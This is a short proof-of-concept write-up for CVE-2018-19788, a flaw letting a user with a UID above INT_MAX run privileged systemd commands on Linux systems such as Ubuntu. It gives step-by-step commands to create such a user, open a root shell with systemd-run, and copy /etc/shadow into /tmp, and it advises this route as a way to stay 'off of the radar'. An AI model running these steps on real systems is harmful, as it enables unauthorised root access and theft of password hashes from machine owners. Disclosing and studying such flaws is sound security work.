CVE-2018-19788 is an issue where any user with a UID over INT_MAX (IE 4000000000) can run any systemctl command on a systemd linux box, such as Ubuntu. (There is already a writeup to gain a root shell found: here). The main difference between this writeup and the full root shell writeup is that this will be run as the user itself instead of a root user (basically just a PoC to be honest)
To get a root shell it's as simple as running systemd-run -t /bin/bash but if you want to keep off of the radar you can run simple commands to get privileged files without a terminal. Follow these steps to do it:
- Add a user with a UID above INT_MAX:
adduser --uid 4000000000 someusername
- Switch into the user account:
su someusername
- Run the command for whatever file you would like (we'll use /etc/shadow for this):
systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt' - Your file is now in
/tmp:cat /tmp/results_poc.txt
